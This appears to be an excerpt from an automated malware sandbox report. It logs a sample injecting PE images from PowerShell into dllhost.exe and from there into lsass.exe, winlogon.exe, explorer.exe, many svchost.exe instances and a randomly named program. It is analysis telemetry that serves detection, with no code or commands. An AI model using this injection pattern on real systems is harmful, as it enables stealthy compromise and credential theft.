Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 10A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 13E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 28C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 23F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18DFB160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 7DB0000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2852
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: F2CC2D6010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAE230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 7DB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\MoUsoCoreWorker.exe base: 1C5C4260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23A94D50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF36C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 173E6B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 166801F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: 3020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EB71E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3ED0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 227B9BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 232E3380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C06DDB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECA6970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1010000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: A90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 24A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 850000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: D00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 840000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000
